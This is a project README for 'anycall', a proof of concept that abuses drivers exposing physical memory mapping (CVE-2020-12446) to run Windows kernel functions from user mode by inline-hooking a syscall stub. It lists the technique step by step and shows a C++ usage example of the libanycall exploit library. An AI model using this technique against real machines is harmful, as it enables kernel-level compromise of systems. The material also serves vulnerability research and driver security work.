anycall

x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

Read: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html

How it works

1. Allocate physical memory to user virtual memory
   • Allows user-process to manupulate arbitrary physical memory without calling APIs
2. Search entire physical memory until we found function stub to hook, in ntoskrnl.exe physical memory
3. Once the stub found, place inline-hook on the stub
   • simply jmp rax, detour address could be anything we want to invoke
4. syscall it
5. wow, we are user-mode but able to call kernel APIs

Goal of this project

This project is to demonstrate how drivers that allowing user-process to map physical memory for user, and how it is critical vulnerable.

Related CVEs:

• CVE-2020-12446

libanycall

libanycall is the powerful c++ static-library that makes exploit execution of anycall more easily.

Usage

1. link it (e.g, #pragma comment( lib, "libanycall64" ))
2. include (e.g, #include "libanycall.h")

For example:

#include <windows.h>
#include <iostream>

#include "libanycall.h"

#pragma comment( lib, "libanycall64" )

using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );

int main( const int argc, const char** argv, const char** envp )
{
    if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
    {
        printf( "[!] failed to init libanycall\n" );
        return EXIT_FAILURE;
    }
    
    // invoke NT kernel APIs from usermode
    const uint32_t process_id =
        ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );

    printf( "PsGetCurrentProcessId returns %d\n", process_id );

    return EXIT_SUCCESS;
}

License

MIT